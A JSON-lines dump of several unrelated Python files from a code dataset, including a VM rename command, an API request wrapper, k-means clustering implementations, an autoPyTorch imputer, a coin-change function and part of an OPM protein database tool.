info.keys()\n\n # Any info available for the category?\n if not any(k in info for k in keys):\n continue\n\n print('')\n print(white(category, bold=True))\n for k in keys:\n if k not in info:\n continue\n\n # Properly re-indent multiline values\n value = str(info.pop(k))\n value = ('\\n' + ' ' * (max_key_len + 3)).join(value.splitlines())\n print('{} : {}'.format(k.ljust(max_key_len), value))\n\n\n@with_fabric_settings\ndef vm_rename(vm_hostname, new_hostname, offline=False):\n \"\"\"Redefine the VM on the same hypervisor with a different name\n\n We can only do this operation offline. If the VM is online, it needs\n to be shut down. No data will be lost.\n \"\"\"\n\n vm = VM(vm_hostname, ignore_reserved=True)\n _check_defined(vm)\n\n if not offline:\n raise NotImplementedError(\n 'Rename command only works with --offline at the moment.'\n )\n if not vm.is_running():\n raise NotImplementedError(\n 'Rename command only works online at the moment.'\n )\n\n vm.rename(new_hostname)\n","sub_path":"igvm/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":12315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"414307547","text":"\"\"\"Copyright (C) Sam Esla, 2016. MIT License. https://opensource.org/licenses/MIT\"\"\"\nimport json\nimport requests\n\n\nclass RequestMaker:\n \"\"\"\n This class does all the HTTP GET/POST/PUT/PATCH/DEL requests to the API. SMAPICredentials is required.\n It gets API key, access token, and auth headers from this and prepares a Response.session()\n Only GET and POST implemented so far.\n \"\"\"\n\n def __init__(self, api_key, access_token, url):\n \"\"\"\n :param api_key: str: api key associated with the sm dev portal app\n :param access_token: str: access token associated to authenticated user (whose surveys and data it can access). You may get one with get_token function in a future release.\n :param url: str: base url for sm api. 
I made this in case I want to test in different environments :)\n \"\"\"\n if api_key is None or access_token is None or url is None:\n raise TypeError(\"The SM API requests require api_key, and access_token, and url (default value should do!)\")\n\n self.url = url\n self.session = RequestMaker._prepare_session(api_key, access_token)\n\n def post(self, uri, params=None, payload=None, payload_as_json=None):\n \"\"\"\n Simple POST function wrapper around requests. Uses a Requests.session() from (self) to keep track of\n auth headers+params so we don't have to pass them in each time.\n\n :param uri: str: the url suffix to attach to base URL to make the request\n :param params: dict: url paramters to pass to API\n :param payload: dict/list: data in python data structure format\n :param payload_as_json: str: data already in json format\n :return: response: str: a json response from the POST\n \"\"\"\n response = self.session.post(self.url + uri, params=params, json=payload, data=payload_as_json)\n return RequestMaker._process_response(\"Post %s\" % self.url+uri, response)\n\n def get(self, uri, params=None):\n \"\"\"\n Simple GET function wrapper around requests. Uses a Requests.session() from (self) to keep track of\n auth headers+params so we don't have to pass them in each time.\n\n :param uri: str: the url suffix to attach to base URL to make the request\n :param params: dict: url paramters to pass to API\n :return: response: str: a json response from the GET\n \"\"\"\n response = self.session.get(self.url + uri, params=params)\n return RequestMaker._process_response(\"Get %s\" % self.url+uri, response)\n\n @staticmethod\n def _prepare_session(api_key, access_token):\n \"\"\"\n Function to prepare the Requests.session() object.\n\n :param api_key: str: api key associated with the sm dev portal app\n :param access_token: str: access token associated to authenticated user\n :return: Request.session: returns a session that has all the details to authorize it\n to make requests to the API.\n \"\"\"\n session = requests.Session()\n session.params[\"api_key\"] = str(api_key)\n session.headers[\"Authorization\"] = \"bearer \" + str(access_token)\n session.headers[\"Content-Type\"] = \"application/json\"\n return session\n\n @staticmethod\n def _process_response(request, response):\n \"\"\"\n Check if the request was successful, and if so, send json data out,\n otherwise raise an exception.\n\n :param response: Requests.response object: The actual response object from the request.\n :return: returns: str: a json representing the object(s) requested from the API, or error.\n \"\"\"\n if str(response.status_code).startswith('2'):\n print(\"%s Success! %s\" % (request, response.status_code))\n return response.json()\n else:\n raise RequestMakerException(request, response)\n\n\nclass RequestMakerException(Exception):\n \"\"\"\n RequestMakerException class. 
Puts relevant data in easy to read format.\n\n \"\"\"\n\n def __init__(self, request, response):\n Exception.__init__(self)\n self.response = response\n self.request = request\n self.message = str(self)\n\n def __str__(self):\n errs = list()\n errs.append(\"%s Failed!\" % self.request)\n errs.append(\"Status: %s\" % self.response.status_code)\n errs.append(\"Method: %s\" % self.response.request.method)\n errs.append(\"URL: %s\" % self.response.request.url)\n errs.append(\"Headers:\")\n errs.append(json.dumps(self.response.headers, default=lambda o: o.__dict__, sort_keys=True, indent=4))\n errs.append(\"Content:\")\n errs.append(json.dumps(self.response.json(), default=lambda o: o.__dict__, sort_keys=True, indent=4))\n err = '\\n'.join(errs)\n return err\n","sub_path":"request_maker.py","file_name":"request_maker.py","file_ext":"py","file_size_in_byte":4768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"521807475","text":"from selenium import webdriver\n\nfrom adaptation.core.functions import is_url, file_to_url\n\n\nclass SeleniumPhantomJSDriver:\n def __init__(self):\n self.driver = webdriver.PhantomJS()\n\n def execute_script(self, url, script):\n if not is_url(url):\n url = file_to_url(url)\n\n self.driver.get(url)\n\n result = self.driver.execute_script(script)\n\n if 'callPhantom' in result:\n result.remove('callPhantom')\n\n return result\n\n def __del__(self):\n self.driver.quit()\n","sub_path":"adaptation/conflicts/classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"537418772","text":"import tensorflow as tf\nimport tensorflow_datasets as tfds\n\nprint(f'Found {len(tfds.list_builders())} datasets')\nprint(tfds.list_builders()[:10])\n\n# CelabA dataset\n\nceleba_bldr = tfds.builder('celeb_a')\n\nprint(celeba_bldr.info.features)\nprint(celeba_bldr.info.features['image'])\nprint(celeba_bldr.info.features['attributes'].keys())\n\nceleba_bldr.download_and_prepare()\n\ndatasets = celeba_bldr.as_dataset(shuffle_files=False)\ndatasets.keys()\n\nds_train = datasets['train']\nassert isinstance(ds_train, tf.data.Dataset)\n\nds_train = ds_train.map(lambda item: (item['image'], tf.cast(item['attributes']['Male'], tf.int32)))\n\nds_train = ds_train.batch(18)\nimages, labels = next(iter(ds_train))\nprint(images.shape, labels)\n\nimport matplotlib.pyplot as plt\n\nfig = plt.figure(figsize=(12, 8))\nfor i, (image, label) in enumerate(zip(images, labels)):\n ax = fig.add_subplot(3, 6, i+1)\n ax.set_xticks([])\n ax.set_yticks([])\n ax.imshow(image)\n ax.set_title(f'{label}', size=15)\nplt.show()\n\n\n# MNIST dataset\n\nmnist, mnist_info = tfds.load('mnist', with_info=True, shuffle_files=False)\n\nprint(mnist_info)\nprint(mnist.keys())\n\nds_train = mnist['train']\nds_train = ds_train.map(lambda item: (item['image'], item['label']))\nds_train = ds_train.batch(10)\nbatch = next(iter(ds_train))\nprint(batch[0].shape, batch[1])\n\nfig = plt.figure(figsize=(15, 6))\nfor i, (image, label) in enumerate(zip(batch[0], batch[1])):\n ax = fig.add_subplot(2, 5, i+1)\n ax.set_xticks([])\n ax.set_yticks([])\n ax.imshow(image[:, :, 0], cmap='gray_r')\n ax.set_title(f'{label}', 
size=15)\nplt.show()\n","sub_path":"13-training-with-tensorflow/04.loading-tf-dataset-libraries.py","file_name":"04.loading-tf-dataset-libraries.py","file_ext":"py","file_size_in_byte":1581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"642110730","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport random\nimport time\nfrom ClusterUtils.SuperCluster import SuperCluster\nfrom ClusterUtils.ClusterPlotter import _plot_kmeans_\n\nTHRESHOLD = 1e-9\n\n\ndef plot_centroids(centroids):\n plt.scatter(*zip(*centroids))\n plt.show()\n\n\ndef init_random(data, n_clusters):\n return [data[i] for i in np.random.permutation(len(data))[:n_clusters]]\n\n\ndef init_kmeanpp(data, n_clusters):\n # 1st random pick one as centroid to begin with\n centroids = list()\n centroids.append(data[random.randint(0, len(data) - 1)])\n\n # 2nd compute the min distance between every data point and the centroids\n while len(centroids) < n_clusters:\n distances = list(min([np.linalg.norm(x - c) ** 2 for c in centroids]) for x in data)\n\n sum_dist = sum(distances)\n prob = map(lambda d: d / sum_dist, distances)\n\n # pick randomly with range\n # range [0, 1)\n ran = random.random()\n sum_prob = 0\n i = 0\n for num in prob:\n sum_prob += num\n if sum_prob > ran:\n # found the centroid\n centroids.append(data[i])\n break\n i += 1\n return centroids\n\n\ndef init_global(data, n_clusters):\n def naive_kmeans(X, inner_centroids, max_iter=300):\n best_inertia = -1\n for _ in range(max_iter):\n assignment = np.array([np.argmin([np.linalg.norm(centroid - row) for centroid in inner_centroids]) for row in X])\n inner_centroids = [np.average(X[np.where(assignment == cluster)[0]], axis=0) for cluster in range(len(inner_centroids))]\n sse = objective_function(X, assignment, inner_centroids)\n # this run has reached local minimal\n if abs(sse - best_inertia) <= THRESHOLD:\n # that's it\n return inner_centroids\n\n # not good enough, go on iteration\n best_inertia = sse\n\n centroids = []\n for num in range(1, n_clusters + 1):\n if num == 1:\n centroids.append(np.average(data, axis=0))\n continue\n # for n_clusters > 1\n # add a random point to previous centroids\n random_point = data[random.randint(0, len(data) - 1)]\n centroids.append(random_point)\n centroids = naive_kmeans(data, centroids)\n\n return centroids\n\n\ndef objective_function(X, assignment, centroids):\n \"\"\"\n Calculate the cost of current assignment by SSE (Square Sum Error)\n :param assignment: a np.array of integer that represents id of clusters\n :param centroids: a list of np.array that represents centroids for each cluster\n :return: float\n \"\"\"\n\n # Determine distance by the square of euclidean distance\n def square_dist(x):\n \"\"\"\n :param x: np.array, for example: [3.0, 4.0]\n :return: for example: 25.0\n \"\"\"\n return sum(each ** 2 for each in x)\n\n datasets = [X[np.where(assignment == cluster)[0]] for cluster in range(len(centroids))]\n sse_sum = 0\n for i in range(len(datasets)):\n sse_sum += sum(square_dist(row - centroids[i]) for row in datasets[i])\n\n return sse_sum\n\n\ndef kmeans_lloyds(X, n_clusters=3, init='random', n_init=1, max_iter=300, verbose=False):\n init_methods = {\n \"random\": init_random,\n \"k-mean++\": init_kmeanpp,\n \"global\": init_global\n }\n\n best_centroids, best_assignment, best_inertia = None, None, None\n\n if verbose:\n print(\"\\n>>> Starting Lloyds k-means with {} init, {} clusters\".format(init, n_clusters))\n\n # for 
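init_kmeanpp above implements k-means++ seeding: after a random first centroid, each further centroid is drawn with probability proportional to its squared distance from the nearest centroid chosen so far. A self-contained numpy sketch of the same D^2 sampling on toy data, independent of the class machinery here:

import numpy as np

def kmeanspp_seeds(data, k, rng=np.random):
    seeds = [data[rng.randint(len(data))]]
    while len(seeds) < k:
        # Squared distance to the closest existing seed, per point.
        d2 = np.array([min(np.linalg.norm(x - s) ** 2 for s in seeds)
                       for x in data])
        probs = d2 / d2.sum()
        seeds.append(data[rng.choice(len(data), p=probs)])
    return np.array(seeds)

toy = np.vstack([np.random.randn(20, 2), np.random.randn(20, 2) + 5])
print(kmeanspp_seeds(toy, 2))  # two seeds, very likely one per blob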
each iteration of this algorithm\n for _run in range(n_init):\n # init centroids\n centroids = init_methods[init](X, n_clusters)\n\n inertia = -1\n for _iter in range(max_iter):\n assignment = np.array([np.argmin([np.linalg.norm(centroid - row) for centroid in centroids]) for row in X])\n centroids = [np.average(X[np.where(assignment == cluster)[0]], axis=0) for cluster in range(n_clusters)]\n\n sse = objective_function(X, assignment, centroids)\n # this run has reached local minimal\n if abs(sse - inertia) <= THRESHOLD:\n if best_inertia is not None and sse >= best_inertia:\n # we are doing worse, just skip this run\n if verbose:\n print(\">>> Discard iteration {} at run {}, with sse {:.2f}\".format(_iter, _run, sse))\n break\n # that's it, finish this run and record the result\n best_centroids = centroids\n best_assignment = assignment\n best_inertia = sse\n\n if verbose:\n print(\">>> Accept K-mean after iteration {} at run {}, with sse: {:.2f}\".format(_iter, _run, sse))\n break\n\n # not good enough, go no iteration\n inertia = sse\n\n return best_centroids, best_assignment, best_inertia\n\n\ndef kmeans_hartigans(X, n_clusters=3, init='random', n_init=1, max_iter=300, verbose=False):\n def d(x, i_cluster, assignment, centroids):\n scalar = 0.5\n n = np.count_nonzero(assignment == i_cluster)\n fraction = n / (n + 1)\n dist = np.linalg.norm(x - centroids[i_cluster]) ** 2\n return scalar * fraction * dist\n\n init_methods = {\n \"random\": init_random,\n \"k-mean++\": init_kmeanpp,\n \"global\": init_global\n }\n\n best_centroids, best_assignment, best_inertia = None, None, None\n\n if verbose:\n print(\">>> Starting Hartigan's k-means with {} init, {} clusters\".format(init, n_clusters))\n\n for _run in range(n_init):\n centroids = init_methods[init](X, n_clusters)\n inertia = -1\n\n for _iter in range(max_iter):\n assignment = np.array([np.argmin([np.linalg.norm(centroid - row) for centroid in centroids]) for row in X])\n\n # main loop\n done = False\n while not done:\n done = True\n for i_data_point in range(len(X)):\n # for each data point, remove it from current cluster, update the centroid of that cluster\n prev_cluster = assignment[i_data_point]\n assignment[i_data_point] = -1\n centroids[prev_cluster] = np.average(X[np.where(assignment == prev_cluster)], axis=0)\n\n # and find a new cluster to assign to by function D(x)\n list_result = [d(X[i_data_point], cluster, assignment, centroids) for cluster in range(len(centroids))]\n new_cluster = np.argmin(list_result)\n if new_cluster != prev_cluster:\n done = False\n\n # if it gets assigned to a new cluster, merge it into it and update the centroid of that new cluster, and set done to False\n assignment[i_data_point] = new_cluster\n centroids[new_cluster] = np.average(X[np.where(assignment == new_cluster)], axis=0)\n\n # after each iteration, lets check the objective function\n sse = objective_function(X, assignment, centroids)\n # this run has reached local minimal\n if abs(sse - inertia) <= THRESHOLD:\n if best_inertia is not None and sse >= best_inertia:\n # we are doing worse, just skip this run\n if verbose:\n print(\">>> Discard iteration {} at run {}, with sse {:.2f}\".format(_iter, _run, sse))\n break\n # that's it, finish this run and record the result\n best_centroids = centroids\n best_assignment = assignment\n best_inertia = sse\n\n if verbose:\n print(\">>> Accept K-mean after iteration {} at run {}, with sse: {:.2f}\".format(_iter, _run, sse))\n break\n\n # not good enough, go no iteration\n inertia = sse\n\n return 
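Each Lloyd iteration above alternates a nearest-centroid assignment step with a per-cluster mean update, stopping once the SSE improvement falls below THRESHOLD. The two steps in isolation, on a toy array:

import numpy as np

X = np.array([[0.0, 0.0], [0.1, 0.2], [5.0, 5.0], [5.2, 4.9]])
centroids = np.array([[0.0, 0.0], [5.0, 5.0]])

# Assignment step: index of the nearest centroid for every point.
assignment = np.array([np.argmin([np.linalg.norm(c - row) for c in centroids])
                       for row in X])
# Update step: each centroid becomes the mean of its assigned points.
centroids = np.array([X[assignment == k].mean(axis=0) for k in range(2)])
print(assignment, centroids)  # [0 0 1 1] and the two cluster means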
best_centroids, best_assignment, best_inertia\n\n\ndef k_means(X, n_clusters=3, init='random', algorithm='lloyds', n_init=1, max_iter=300, verbose=False):\n cluster_algorithm = {\n \"lloyds\": kmeans_lloyds,\n \"hartigans\": kmeans_hartigans\n }\n\n # Implement.\n # Input: np.darray of samples\n best_centroids, best_assignment, best_inertia = cluster_algorithm[algorithm](X, n_clusters, init, n_init, max_iter, verbose)\n\n # Return the following:\n #\n # 1. labels: An array or list-type object corresponding to the predicted\n # cluster numbers,e.g., [0, 0, 0, 1, 1, 1, 2, 2, 2]\n # 2. centroids: An array or list-type object corresponding to the vectors\n # of the centroids, e.g., [[0.5, 0.5], [-1, -1], [3, 3]]\n # 3. inertia: A number corresponding to some measure of fitness,\n # generally the best of the results from executing the algorithm n_init times.\n # You will want to return the 'best' labels and centroids by this measure.\n\n return best_assignment, best_centroids, best_inertia\n\n\n# The code below is completed for you.\n# You may modify it as long as changes are noted in the comments.\n\nclass KMeans(SuperCluster):\n \"\"\"\n Parameters\n ----------\n n_clusters : int, optional, default: 8\n The number of clusters to form as well as the number of\n centroids to generate.\n init : {'random', 'k-means++', 'global'}\n Method for initialization, defaults to 'random'.\n algorithm : {'lloyds', 'hartigans'}\n Method for determing algorithm, defaults to 'lloyds'.\n n_init : int, default: 1\n Number of time the k-means algorithm will be run with different\n centroid seeds. The final results will be the best output of\n n_init consecutive runs in terms of inertia.\n max_iter : int, default: 300\n Maximum number of iterations of the k-means algorithm for a\n single run.\n csv_path : str, default: None\n Path to file for dataset csv\n keep_dataframe : bool, default: True\n Hold on the results pandas DataFrame generated after each run.\n Also determines whether to use pandas DataFrame as primary internal data state\n keep_X : bool, default: True\n Hold on the results generated after each run in a more generic array-type format\n Use these values if keep_dataframe is False\n verbose: bool, default: False\n Optional log level\n \"\"\"\n\n def __init__(self, n_clusters=3, init='random', algorithm='lloyds', n_init=1, max_iter=300,\n csv_path=None, keep_dataframe=True, keep_X=True, verbose=False):\n self.n_clusters = n_clusters\n self.init = init\n self.algorithm = algorithm\n self.n_init = n_init\n self.max_iter = max_iter\n self.csv_path = csv_path\n self.keep_dataframe = keep_dataframe\n self.keep_X = keep_X\n self.verbose = verbose\n\n # X is an array of shape (n_samples, n_features)\n def fit(self, X):\n if self.keep_X:\n self.X = X\n start_time = time.time()\n self.labels, self.centroids, self.inertia = \\\n k_means(X, n_clusters=self.n_clusters, init=self.init, algorithm=self.algorithm,\n n_init=self.n_init, max_iter=self.max_iter, verbose=self.verbose)\n print(self.init + \" k-means finished in %s seconds\" % (time.time() - start_time))\n return self\n\n def show_plot(self):\n if self.keep_dataframe and hasattr(self, 'DF'):\n _plot_kmeans_(df=self.DF)\n elif self.keep_X:\n _plot_kmeans_(X=self.X, labels=self.labels, centroids=self.centroids)\n else:\n print('No data to plot.')\n\n def save_plot(self, name='kmeans_plot'):\n if self.keep_dataframe and hasattr(self, 'DF'):\n _plot_kmeans_(df=self.DF, save=True, n=name)\n elif self.keep_X:\n _plot_kmeans_(X=self.X, labels=self.labels,\n 
centroids=self.centroids, save=True, n=name)\n else:\n print('No data to plot.')\n","sub_path":"ClusterUtils/KMeans.py","file_name":"KMeans.py","file_ext":"py","file_size_in_byte":12046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"274119951","text":"from typing import Any, Dict, List, Optional, Union\n\nfrom ConfigSpace.configuration_space import ConfigurationSpace\nfrom ConfigSpace.hyperparameters import (\n CategoricalHyperparameter\n)\n\nimport numpy as np\n\nfrom sklearn.impute import SimpleImputer as SklearnSimpleImputer\n\nfrom autoPyTorch.datasets.base_dataset import BaseDatasetPropertiesType\nfrom autoPyTorch.pipeline.components.preprocessing.tabular_preprocessing.imputation.base_imputer import BaseImputer\nfrom autoPyTorch.utils.common import HyperparameterSearchSpace, add_hyperparameter\n\n\nclass SimpleImputer(BaseImputer):\n \"\"\"\n Impute missing values for categorical columns with '!missing!'\n (In case of numpy data, the constant value is set to -1, under\n the assumption that categorical data is fit with an Ordinal Scaler)\n \"\"\"\n\n def __init__(self,\n random_state: Optional[Union[np.random.RandomState, int]] = None,\n numerical_strategy: str = 'mean',\n categorical_strategy: str = 'most_frequent'):\n super().__init__()\n self.random_state = random_state\n self.numerical_strategy = numerical_strategy\n self.categorical_strategy = categorical_strategy\n\n def fit(self, X: Dict[str, Any], y: Any = None) -> BaseImputer:\n \"\"\"\n The fit function calls the fit function of the underlying model\n and returns the transformed array.\n Args:\n X (np.ndarray): input features\n y (Optional[np.ndarray]): input labels\n\n Returns:\n instance of self\n \"\"\"\n self.check_requirements(X, y)\n categorical_columns = X['dataset_properties']['categorical_columns'] \\\n if isinstance(X['dataset_properties']['categorical_columns'], List) else []\n if len(categorical_columns) != 0:\n if self.categorical_strategy == 'constant_!missing!':\n self.preprocessor['categorical'] = SklearnSimpleImputer(strategy='constant',\n # Train data is numpy\n # as of this point, where\n # Ordinal Encoding is using\n # for categorical. 
Only\n # Numbers are allowed\n # fill_value='!missing!',\n fill_value=-1,\n copy=False)\n else:\n self.preprocessor['categorical'] = SklearnSimpleImputer(strategy=self.categorical_strategy,\n copy=False)\n numerical_columns = X['dataset_properties']['numerical_columns'] \\\n if isinstance(X['dataset_properties']['numerical_columns'], List) else []\n if len(numerical_columns) != 0:\n if self.numerical_strategy == 'constant_zero':\n self.preprocessor['numerical'] = SklearnSimpleImputer(strategy='constant',\n fill_value=0,\n copy=False)\n else:\n self.preprocessor['numerical'] = SklearnSimpleImputer(strategy=self.numerical_strategy, copy=False)\n\n return self\n\n @staticmethod\n def get_hyperparameter_search_space(\n dataset_properties: Optional[Dict[str, BaseDatasetPropertiesType]] = None,\n numerical_strategy: HyperparameterSearchSpace = HyperparameterSearchSpace(hyperparameter='numerical_strategy',\n value_range=(\"mean\", \"median\",\n \"most_frequent\",\n \"constant_zero\"),\n default_value=\"mean\",\n ),\n categorical_strategy: HyperparameterSearchSpace = HyperparameterSearchSpace(\n hyperparameter='categorical_strategy',\n value_range=(\"most_frequent\",\n \"constant_!missing!\"),\n default_value=\"most_frequent\")\n ) -> ConfigurationSpace:\n cs = ConfigurationSpace()\n assert dataset_properties is not None, \"To create hyperparameter search space\" \\\n \", dataset_properties should not be None\"\n if len(dataset_properties['numerical_columns']) \\\n if isinstance(dataset_properties['numerical_columns'], List) else 0 != 0:\n add_hyperparameter(cs, numerical_strategy, CategoricalHyperparameter)\n\n if len(dataset_properties['categorical_columns']) \\\n if isinstance(dataset_properties['categorical_columns'], List) else 0 != 0:\n add_hyperparameter(cs, categorical_strategy, CategoricalHyperparameter)\n\n return cs\n\n @staticmethod\n def get_properties(dataset_properties: Optional[Dict[str, BaseDatasetPropertiesType]] = None\n ) -> Dict[str, Union[str, bool]]:\n return {\n 'shortname': 'SimpleImputer',\n 'name': 'Simple Imputer',\n 'handles_sparse': True\n }\n","sub_path":"autoPyTorch/pipeline/components/preprocessing/tabular_preprocessing/imputation/SimpleImputer.py","file_name":"SimpleImputer.py","file_ext":"py","file_size_in_byte":5707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"580910266","text":"# python3\n\n\ndef money_change(money):\n assert 0 <= money <= 10 ** 3\n coins = [10,5,1]\n i = 0\n j = 0\n while(money > 0):\n if coins[i] > money:\n i += 1\n else:\n j += 1\n money -= coins[i]\n return j\n\n\n\n\nif __name__ == '__main__':\n input_money = int(input())\n print(money_change(input_money))\n","sub_path":"A/money_change.py","file_name":"money_change.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"182777058","text":"#!/usr/bin/env python3\n\n#\n# bst_radix.py\n#\n# python-training/algorithms (c) 2017 by Franco Masotti\n# \n#\n# To the extent possible under law, the person who associated CC0 with\n# python-training/algorithms has waived all copyright and related or \n# neighboring rights to python-training/algorithms. This software is \n# distributed without any warranty.\n#\n# You should have received a copy of the CC0 legalcode along with this\n# software. 
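The SimpleImputer component above delegates to scikit-learn's imputer, filling ordinally-encoded categorical columns with the constant -1. The same constant-fill behaviour in a minimal sklearn-only sketch, outside the autoPyTorch pipeline:

import numpy as np
from sklearn.impute import SimpleImputer

# Ordinally-encoded categorical column with one missing entry.
X_cat = np.array([[0.0], [2.0], [np.nan], [1.0]])
imp = SimpleImputer(strategy='constant', fill_value=-1)
print(imp.fit_transform(X_cat))  # the nan becomes -1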
If not, see .\n\nimport random\nimport timeit\nfrom bst import Bst, BstNode\n\n# From exercise 12-2\n#\n# A radix tree for an alphabet of |sigma| = 2 (two symbols)\n# implies that all the possible strings can be originated by a binary tree.\nSIGMA = ['0', '1']\n\n\n###\n### NOTE: There is no bst here. It's just a proof of concept.\n###\n\n# a < b?\ndef rule_1(a,b,p,q):\n j = min(p,q)\n if a[0:j-1] == b[0:j-1] and a[j] < b[j]:\n return True\n else:\n return False\n\ndef rule_2(a,b,p,q):\n if p < q and a[0:p] == b[0:p]:\n return True\n else:\n return False\n\ndef a_lt_b(a,b,p,q):\n if rule_1(a,b,p,q) or rule_2(a,b,p,q):\n return True\n else:\n return False\n\n# Same examples as in the book.\ndef test_poc():\n a1 = \"10100\"\n b1 = \"10110\"\n p1 = 3\n q1 = 3\n\n a2 = \"10100\"\n b2 = \"101000\"\n p2 = len(a2)-1\n q2 = len(b2)-1\n\n assert a_lt_b(a1,b1,p1,q1) and a_lt_b(a2,b2,p2,q2)\n\n# Test time for both implementations of insert\n# Assert that time.insert_improve <= time.insert.\n# This should be especially true if all the inserted keys are eual to\n# eachother.\ndef test(tests,verbose=False):\n test_poc()\n\n# Run n tests and check that the n lists returned are all equal to each other\n# knowing that they have been generated randomly, they have the same size\n# and the same unique keys. This means that the MAX - MIN + 1 numbers generated\n# above are instered in the data structure randomly.\nif __name__ == '__main__':\n TESTS = 50\n\n test(TESTS)\n print (\"All tests passed\")\n\n","sub_path":"algorithms/bst_radix.py","file_name":"bst_radix.py","file_ext":"py","file_size_in_byte":2079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"167032992","text":"#!/usr/bin/env python\nfrom __future__ import print_function, division\n\nimport urllib\nimport sys, os, re\nimport argparse\nimport json\nimport math\nimport csv\nimport subprocess\n\nimport Bio.PDB\ntry: CODE = Bio.PDB.protein_letters_3to1\nexcept AttributeError: CODE = Bio.PDB.to_one_letter_code\n\n#TODO: move common classes out\nimport pdbtm_dbtool\n\nclass OPM(object):\n\tdef __init__(self):\n\t\tpass\n\n\ndef _scroll_json(url):\n\t''' Collects all pages for a multipage JSON '''\n\tout = []\n\tf = urllib.urlopen(url)\n\traw = f.read()\n\tobj = json.loads(raw)\n\ttotal_objects = obj['total_objects']\n\tpage_end = obj['page_end']\n\tpage_num = obj['page_num']\n\tpage_size = obj['page_size']\n\n\tout += obj['objects']\n\n\tfor i in range(page_num+1, int(math.ceil(total_objects/page_size))):\n\t\tf = urllib.urlopen(url + '?pageNum={}'.format(i))\n\t\traw = f.read()\n\t\tobj = json.loads(raw)\n\t\tout += obj['objects']\n\treturn json.dumps(out)\ndef get_database(prefix='.'):\n\t''' (Deprecated) Fetched the OPM database dump '''\n\tprint('Fetching database...', file=sys.stderr)\n\twith open('{}/opmall.json'.format(prefix), 'w') as f: pass\n\n\tfor table in ('types', 'classtypes', 'superfamilies', 'families', 'primary_structures', 'structure_subunits'):\n\t\tdata = _scroll_json('https://lomize-group-opm.herokuapp.com/{}'.format(table))\n\t\t\n\t\t#db = urllib.urlopen('https://lomize-group-opm.herokuapp.com/{}'.format(table))\n\t\twith open('{}/opmall.json'.format(prefix), 'a') as f: \n\t\t\tf.write('// {}\\n'.format(table))\n\t\t\tf.write(data)\n\t\t\tf.write('\\n')\n\t#print('Saving database...', file=sys.stderr)\n\texit()\n\ndef build_database(fn, prefix):\n\t''' Unpacked the OPM database and converted it into the ASSIGNMENTS.TSV '''\n\tprint('Unpacking database...', 
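_scroll_json above pages through the OPM API by reading total_objects, page_num, and page_size from the first response, then requesting ?pageNum=i until every page is collected. The same pattern written against the requests library (a sketch; the commented endpoint is just an example taken from the code above):

import math
import requests

def scroll(url):
    first = requests.get(url).json()
    objects = list(first['objects'])
    pages = int(math.ceil(first['total_objects'] / float(first['page_size'])))
    for i in range(first['page_num'] + 1, pages):
        objects += requests.get(url, params={'pageNum': i}).json()['objects']
    return objects

# e.g. scroll('https://lomize-group-opm.herokuapp.com/families')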
file=sys.stderr)\n\n\t#db = {'atlas':[], 'citation':[], 'class':[], 'classification':[], 'family':[], 'history':[], 'membrane':[], 'protein':[], 'relatedproteins':[], 'relatedproteinstemp':[], 'relatedproteinstempnew':[], 'species':[], 'subunits':[], 'superfamily':[], 'type':[]}\n\tdb = {'atlas':[], 'citation':[], 'class':[], 'classification':[], 'family':[], 'history':[], 'membrane':[], 'protein':[], 'relatedproteins':[], 'relatedproteinstemp':[], 'relatedproteinstempnew':[], 'species':[], 'subunits':[], 'superfamily':[], 'type':[]}\n\twith open(fn) as f:\n\t\tn = 0\n\t\tfor l in f:\n\t\t\tif not l.startswith('['): continue\n\t\t\tdb[sorted(db)[n]] = json.loads(l)\n\t\t\tn += 1\n\n\tproteins = {}\n\tfor protein in db['protein']:\n\t\tpdbid = protein['pdbid']\n\t\tproteins[pdbid] = pdbtm_dbtool.PDB()\n\t\tproteins[pdbid].label = pdbid\n\n\trelated_proteins = {}\n\tparent_proteins = {}\n\tfor relprot in db['relatedproteins']:\n\t\trel_pdbid = relprot['pdbid']\n\t\tpar_pdbid = relprot['protein_pdbid']\n\n\t\tif par_pdbid in proteins and rel_pdbid in proteins: pass\n\t\telif par_pdbid in proteins:\n\t\t\tparent_proteins[rel_pdbid] = par_pdbid\n\t\t\ttry: related_proteins[par_pdbid].append(rel_pdbid)\n\t\t\texcept KeyError: related_proteins[par_pdbid] = [rel_pdbid]\n\t\t\t#proteins[rel_pdbid] = pdbtm_dbtool.PDB()\n\t\t\t#proteins[rel_pdbid].label = rel_pdbid\n\t\t#necessary because 1ym6 is misannotated as being a relative of 1okc\n\t\telse:\n\t\t\tparent_proteins[par_pdbid] = rel_pdbid\n\t\t\ttry: related_proteins[rel_pdbid].append(par_pdbid)\n\t\t\texcept KeyError: related_proteins[rel_pdbid] = [par_pdbid]\n\t\t\t#proteins[par_pdbid] = pdbtm_dbtool.PDB()\n\t\t\t#proteins[par_pdbid].label = par_pdbid\n\n\t#print(related_proteins['1ym6'])\n\t#for p in related_proteins: print(p, related_proteins[p])\n\t#for p in proteins: print(p)\n\t#exit()\n\n\tprint('Writing assignments to {}/ASSIGNMENTS.TSV...'.format(prefix), file=sys.stderr)\n\twriteme = []\n\tfor subunit in db['subunits']:\n\t\tpdbid = subunit['pdbid']\n\t\tletter = subunit['letter']\n\t\t#print(subunit['pdbid'], subunit['letter'], subunit['pdbid'] in proteins)\n\t\tif pdbid not in proteins:\n\t\t\t#necessary because 2iqo_? 
